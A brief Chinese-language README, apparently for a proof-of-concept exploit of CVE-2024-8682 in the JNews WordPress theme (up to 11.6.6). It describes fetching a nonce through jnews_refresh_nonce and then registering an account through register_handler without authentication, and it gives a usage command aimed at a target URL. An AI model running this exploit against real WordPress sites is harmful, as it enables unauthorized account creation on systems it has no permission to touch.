JNews (<= 11.6.6) 存在一个漏洞,允许通过 ?ajax-request=jnews 端点进行未经身份验证的用户注册,即使 WordPress 注册功能已禁用。
该漏洞首先通过 jnews_refresh_nonce 操作获取有效的 jnews_nonce,然后使用它通过 register_handler 注册新用户。
python3 cve-2024-8682.py -u https://target.com -n newuser -e [email protected]
-u: 目标 WordPress URL-n: 用户名-e: 邮箱